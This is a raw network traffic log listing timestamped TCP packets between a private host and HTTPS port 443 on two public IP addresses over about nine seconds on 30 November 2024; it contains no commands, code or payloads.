Nov 30, 2024 12:48:11.265825987 CET	49780	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.265839100 CET	443	49780	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.348987103 CET	49781	443	192.168.2.4	142.250.181.100
Nov 30, 2024 12:48:11.349047899 CET	443	49781	142.250.181.100	192.168.2.4
Nov 30, 2024 12:48:11.349132061 CET	49781	443	192.168.2.4	142.250.181.100
Nov 30, 2024 12:48:11.349880934 CET	49781	443	192.168.2.4	142.250.181.100
Nov 30, 2024 12:48:11.349898100 CET	443	49781	142.250.181.100	192.168.2.4
Nov 30, 2024 12:48:11.362838030 CET	443	49776	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.362911940 CET	443	49776	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.363002062 CET	49776	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.363343954 CET	49776	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.363358021 CET	443	49776	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.363365889 CET	49776	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.363370895 CET	443	49776	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.367768049 CET	49782	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.367830038 CET	443	49782	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.367923021 CET	49782	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.368079901 CET	49782	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.368109941 CET	443	49782	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.432487965 CET	443	49777	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.432559013 CET	443	49777	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.432620049 CET	49777	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.432761908 CET	49777	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.432776928 CET	443	49777	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.432786942 CET	49777	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.432790995 CET	443	49777	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.435233116 CET	49783	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.435271025 CET	443	49783	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.435342073 CET	49783	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.435455084 CET	49783	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.435467005 CET	443	49783	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.476361036 CET	443	49779	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.476408005 CET	443	49779	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.476476908 CET	49779	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.476623058 CET	49779	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.476629019 CET	443	49779	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.476641893 CET	49779	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.476644993 CET	443	49779	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.478544950 CET	49784	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.478569984 CET	443	49784	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.479033947 CET	49784	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.479182005 CET	49784	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.479195118 CET	443	49784	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.501025915 CET	443	49778	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.501071930 CET	443	49778	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.501128912 CET	49778	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.501324892 CET	49778	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.501332045 CET	443	49778	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.501339912 CET	49778	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.501343012 CET	443	49778	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.503247023 CET	49785	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.503269911 CET	443	49785	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.503333092 CET	49785	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.503444910 CET	49785	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.503460884 CET	443	49785	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.721525908 CET	443	49780	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.721570015 CET	443	49780	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.721635103 CET	49780	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.721879959 CET	49780	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.721910000 CET	443	49780	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.721934080 CET	49780	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.721947908 CET	443	49780	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.724715948 CET	49786	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.724729061 CET	443	49786	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:11.724808931 CET	49786	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.724967003 CET	49786	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:11.724977970 CET	443	49786	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.136338949 CET	443	49781	142.250.181.100	192.168.2.4
Nov 30, 2024 12:48:13.136678934 CET	49781	443	192.168.2.4	142.250.181.100
Nov 30, 2024 12:48:13.136698961 CET	443	49781	142.250.181.100	192.168.2.4
Nov 30, 2024 12:48:13.137022972 CET	443	49781	142.250.181.100	192.168.2.4
Nov 30, 2024 12:48:13.137331009 CET	49781	443	192.168.2.4	142.250.181.100
Nov 30, 2024 12:48:13.137397051 CET	443	49781	142.250.181.100	192.168.2.4
Nov 30, 2024 12:48:13.146742105 CET	443	49782	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.147284985 CET	49782	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.147337914 CET	443	49782	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.147788048 CET	49782	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.147803068 CET	443	49782	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.187583923 CET	49781	443	192.168.2.4	142.250.181.100
Nov 30, 2024 12:48:13.224584103 CET	443	49783	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.225024939 CET	49783	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.225047112 CET	443	49783	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.225447893 CET	49783	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.225452900 CET	443	49783	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.261482954 CET	443	49784	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.261826038 CET	49784	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.261840105 CET	443	49784	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.262198925 CET	49784	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.262204885 CET	443	49784	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.283413887 CET	443	49785	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.283760071 CET	49785	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.283772945 CET	443	49785	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.284146070 CET	49785	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.284152031 CET	443	49785	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.441612959 CET	443	49786	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.442100048 CET	49786	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.442112923 CET	443	49786	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.442600965 CET	49786	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.442605019 CET	443	49786	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.591583967 CET	443	49782	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.591648102 CET	443	49782	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.591713905 CET	49782	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.591901064 CET	49782	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.591948032 CET	443	49782	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.591978073 CET	49782	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.591995955 CET	443	49782	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.595069885 CET	49787	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.595103025 CET	443	49787	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.595169067 CET	49787	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.595338106 CET	49787	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.595350981 CET	443	49787	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.667402983 CET	443	49783	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.667473078 CET	443	49783	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.667624950 CET	49783	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.667656898 CET	49783	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.667656898 CET	49783	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.667671919 CET	443	49783	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.667680979 CET	443	49783	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.669666052 CET	49788	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.669696093 CET	443	49788	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.669771910 CET	49788	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.669898033 CET	49788	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.669913054 CET	443	49788	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.728100061 CET	443	49785	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.728151083 CET	443	49785	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.728202105 CET	49785	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.728413105 CET	49785	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.728413105 CET	49785	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.728421926 CET	443	49785	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.728430986 CET	443	49785	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.730252028 CET	49789	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.730282068 CET	443	49789	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.730355978 CET	49789	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.730467081 CET	49789	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.730479956 CET	443	49789	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.739593029 CET	443	49784	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.739636898 CET	443	49784	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.739691019 CET	49784	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.739813089 CET	49784	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.739824057 CET	443	49784	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.739831924 CET	49784	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.739835978 CET	443	49784	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.741652966 CET	49790	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.741662025 CET	443	49790	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.741719007 CET	49790	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.741849899 CET	49790	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.741862059 CET	443	49790	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.877468109 CET	443	49786	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.877511978 CET	443	49786	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.877583981 CET	49786	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.877744913 CET	49786	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.877752066 CET	443	49786	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.877760887 CET	49786	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.877763987 CET	443	49786	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.880122900 CET	49791	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.880160093 CET	443	49791	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:13.880232096 CET	49791	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.880506992 CET	49791	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:13.880518913 CET	443	49791	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.446007967 CET	443	49787	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.446659088 CET	49787	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.446681023 CET	443	49787	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.447119951 CET	49787	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.447124004 CET	443	49787	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.526245117 CET	443	49788	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.530788898 CET	49788	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.530817986 CET	443	49788	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.532124996 CET	49788	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.532130957 CET	443	49788	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.574712038 CET	443	49789	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.575486898 CET	49789	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.575515032 CET	443	49789	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.575828075 CET	49789	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.575834036 CET	443	49789	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.585757971 CET	443	49790	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.586030960 CET	49790	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.586042881 CET	443	49790	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.586457014 CET	49790	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.586460114 CET	443	49790	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.734193087 CET	443	49791	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.734671116 CET	49791	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.734694958 CET	443	49791	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.735140085 CET	49791	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.735145092 CET	443	49791	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.899658918 CET	443	49787	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.899720907 CET	443	49787	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.899976969 CET	49787	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.900011063 CET	49787	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.900027990 CET	443	49787	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.900038004 CET	49787	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.900043011 CET	443	49787	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.903070927 CET	49792	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.903095961 CET	443	49792	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.903177023 CET	49792	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.903345108 CET	49792	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.903357983 CET	443	49792	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.979481936 CET	443	49788	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.979561090 CET	443	49788	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.979739904 CET	49788	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.979764938 CET	49788	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.979775906 CET	443	49788	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.979785919 CET	49788	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.979790926 CET	443	49788	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.982199907 CET	49793	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.982224941 CET	443	49793	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:15.982301950 CET	49793	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.982435942 CET	49793	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:15.982446909 CET	443	49793	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:16.028740883 CET	443	49789	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:16.028790951 CET	443	49789	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:16.028950930 CET	49789	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:16.029109001 CET	49789	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:16.029125929 CET	443	49789	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:16.029139042 CET	49789	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:16.029145002 CET	443	49789	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:16.031378984 CET	49794	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:16.031389952 CET	443	49794	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:16.031470060 CET	49794	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:16.031672955 CET	49794	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:16.031683922 CET	443	49794	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:16.040270090 CET	443	49790	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:16.040317059 CET	443	49790	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:16.040441990 CET	49790	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:16.040471077 CET	49790	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:16.040476084 CET	443	49790	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:16.040483952 CET	49790	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:16.040487051 CET	443	49790	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:16.042351961 CET	49795	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:16.042366982 CET	443	49795	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:16.042423964 CET	49795	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:16.042530060 CET	49795	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:16.042547941 CET	443	49795	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:16.188425064 CET	443	49791	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:16.188474894 CET	443	49791	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:16.188592911 CET	49791	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:16.188858032 CET	49791	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:16.188874006 CET	443	49791	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:16.188894987 CET	49791	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:16.188901901 CET	443	49791	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:16.192173004 CET	49796	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:16.192188978 CET	443	49796	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:16.192251921 CET	49796	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:16.192610025 CET	49796	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:16.192620039 CET	443	49796	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:17.684576035 CET	443	49792	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:17.685128927 CET	49792	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:17.685158014 CET	443	49792	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:17.685767889 CET	49792	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:17.685774088 CET	443	49792	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:17.751003981 CET	443	49794	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:17.751451969 CET	49794	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:17.751466036 CET	443	49794	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:17.751786947 CET	49794	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:17.751791954 CET	443	49794	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:17.825412035 CET	443	49795	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:17.825851917 CET	49795	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:17.825874090 CET	443	49795	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:17.826128006 CET	49795	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:17.826133966 CET	443	49795	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:17.828593969 CET	443	49793	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:17.828850985 CET	49793	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:17.828859091 CET	443	49793	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:17.829195023 CET	49793	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:17.829199076 CET	443	49793	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:17.975651026 CET	443	49796	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:17.978486061 CET	49796	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:17.978512049 CET	443	49796	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:17.978910923 CET	49796	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:17.978914976 CET	443	49796	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.128531933 CET	443	49792	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.128593922 CET	443	49792	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.128858089 CET	49792	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.128887892 CET	49792	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.128900051 CET	443	49792	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.128911018 CET	49792	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.128916025 CET	443	49792	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.131884098 CET	49797	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.131922960 CET	443	49797	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.131982088 CET	49797	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.132145882 CET	49797	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.132158995 CET	443	49797	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.189852953 CET	443	49794	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.189901114 CET	443	49794	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.190045118 CET	49794	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.190069914 CET	49794	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.190078974 CET	443	49794	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.190088987 CET	49794	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.190093994 CET	443	49794	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.192342043 CET	49798	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.192363977 CET	443	49798	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.192437887 CET	49798	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.192576885 CET	49798	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.192589998 CET	443	49798	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.269934893 CET	443	49795	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.269990921 CET	443	49795	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.270102024 CET	49795	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.270256996 CET	49795	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.270272017 CET	443	49795	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.279087067 CET	49799	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.279115915 CET	443	49799	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.279196978 CET	49799	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.279350996 CET	49799	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.279364109 CET	443	49799	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.281905890 CET	443	49793	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.281982899 CET	443	49793	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.282098055 CET	49793	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.282129049 CET	49793	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.282135963 CET	443	49793	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.282144070 CET	49793	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.282147884 CET	443	49793	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.284203053 CET	49800	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.284233093 CET	443	49800	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.284303904 CET	49800	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.284420967 CET	49800	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.284435987 CET	443	49800	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.423156023 CET	443	49796	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.423208952 CET	443	49796	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.423264027 CET	49796	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.423422098 CET	49796	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.423437119 CET	443	49796	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.423446894 CET	49796	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.423450947 CET	443	49796	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.425762892 CET	49801	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.425787926 CET	443	49801	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:18.425956011 CET	49801	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.426064968 CET	49801	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:18.426078081 CET	443	49801	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:19.885288954 CET	443	49797	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:19.885742903 CET	49797	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:19.885759115 CET	443	49797	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:19.886226892 CET	49797	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:19.886231899 CET	443	49797	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:20.069273949 CET	443	49799	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:20.069814920 CET	49799	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:20.069829941 CET	443	49799	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:20.070307970 CET	49799	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:20.070312977 CET	443	49799	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:20.148319006 CET	443	49800	13.107.246.63	192.168.2.4
Nov 30, 2024 12:48:20.148724079 CET	49800	443	192.168.2.4	13.107.246.63
Nov 30, 2024 12:48:20.148746967 CET	443	49800	13.107.246.63	192.168.2.4
